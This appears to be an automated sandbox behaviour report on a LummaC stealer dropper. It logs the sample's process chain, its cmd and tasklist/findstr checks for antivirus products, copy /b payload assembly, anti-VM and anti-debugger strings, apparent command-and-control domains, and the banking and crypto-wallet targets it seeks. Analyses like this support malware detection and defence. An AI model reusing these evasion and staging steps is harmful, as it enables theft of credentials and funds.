Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Memory allocated: 5BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Memory allocated: 5A00000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Window / User API: threadDelayed 5022

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

API coverage: 3.7 %

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe TID: 6460	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com TID: 6264	Thread sleep time: -150000s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_00406301 FindFirstFileW,FindClose,	2_2_00406301
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00ACDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	14_2_00ACDC54
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00ADA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	14_2_00ADA087
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00ADA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	14_2_00ADA1E2
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00ACE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	14_2_00ACE472
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00ADA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	14_2_00ADA570
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00AD66DC FindFirstFileW,FindNextFileW,FindClose,	14_2_00AD66DC
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A9C622 FindFirstFileExW,	14_2_00A9C622
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00AD73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	14_2_00AD73D4
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00AD7333 FindFirstFileW,FindClose,	14_2_00AD7333
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00ACD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	14_2_00ACD921

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00A65FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

14_2_00A65FC8

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\768400\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: TNyOrM6mIM.exe, TNyOrM6mIM.exe, 00000000.00000002.2382864840.0000000001162000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B52000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696508427p
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696508427
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696508427s
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696508427f
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696508427
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696508427d
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696508427t
Source: Set-up.exe, Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: TNyOrM6mIM.exe, TNyOrM6mIM.exe, 00000000.00000002.2380121597.0000000000852000.00000040.00000001.01000000.00000003.sdmp, TNyOrM6mIM.exe, 00000000.00000003.2338156442.00000000057B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DetectVirtualMachine
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696508427\|UE
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000003.00000003.2385517493.0000000001487000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
Source: Climb.com, 0000000E.00000002.3576614656.000000000138C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
Source: Set-up.exe, 00000003.00000003.2603485994.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604040691.0000000001717000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2607804060.000000000171C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2604171109.0000000001719000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696508427o
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: Set-up.exe.0.dr	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696508427
Source: TNyOrM6mIM.exe, 00000000.00000003.2338156442.00000000057B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696508427j
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696508427x
Source: TNyOrM6mIM.exe, 00000000.00000002.2380121597.0000000000852000.00000040.00000001.01000000.00000003.sdmp, TNyOrM6mIM.exe, 00000000.00000003.2338156442.00000000057B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: <Module>laddad.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeladdadEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksin1jhvfotsq.resources
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
Source: TNyOrM6mIM.exe, 00000000.00000002.2383371849.000000000185A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696508427t
Source: TNyOrM6mIM.exe, 00000000.00000002.2382864840.0000000001162000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Climb.com, 0000000E.00000003.2642479190.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696508427

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	File opened: NTICE
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	File opened: SICE
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00ADF4FF BlockInput,

14_2_00ADF4FF

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00A6338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

14_2_00A6338B

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

2_2_00406328

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00A85058 mov eax, dword ptr fs:[00000030h]

14_2_00A85058

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00AC20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

14_2_00AC20AA

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A92992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00A92992
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A80BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00A80BAF
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A80D45 SetUnhandledExceptionFilter,	14_2_00A80D45
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A80F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00A80F91

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: hummskitnj.buzz
Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cashfuzysao.buzz
Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: appliacnesot.buzz
Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: screwamusresz.buzz
Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: inherineau.buzz
Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: scentniej.buzz
Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rebuildeso.buzz
Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: prisonyfork.buzz
Source: Climb.com, 0000000E.00000003.2565656087.0000000003D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: spuriotis.click

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

14_2_00AC1B4D

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00A6338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

14_2_00A6338B

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00ACBBED SendInput,keybd_event,

14_2_00ACBBED

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00ACEC9E mouse_event,

14_2_00ACEC9E

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00AC14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

14_2_00AC14AE

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00AC1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

14_2_00AC1FB0

Source: Climb.com, 0000000E.00000000.2417191632.0000000000B23000.00000002.00000001.01000000.0000000A.sdmp, Climb.com, 0000000E.00000003.2569924765.00000000043EB000.00000004.00000800.00020000.00000000.sdmp, Climb.com.4.dr, Alt.11.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: TNyOrM6mIM.exe, 00000000.00000002.2382864840.0000000001162000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: pProgram Manager
Source: TNyOrM6mIM.exe, TNyOrM6mIM.exe, 00000000.00000002.2382864840.0000000001162000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager
Source: Climb.com	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00A80A08 cpuid

14_2_00A80A08

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00ABE5F4 GetLocalTime,

14_2_00ABE5F4

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00ABE652 GetUserNameW,

14_2_00ABE652

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00A9BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

14_2_00A9BCD2

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

2_2_00406831

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: procmon.exe
Source: TNyOrM6mIM.exe, 00000000.00000003.2345421831.0000000007944000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2355150183.0000000000ADB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: wireshark.exe
Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Climb.com PID: 6996, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: Climb.com, 0000000E.00000002.3576922745.0000000003A89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Climb.com, 0000000E.00000002.3577081921.0000000003D00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
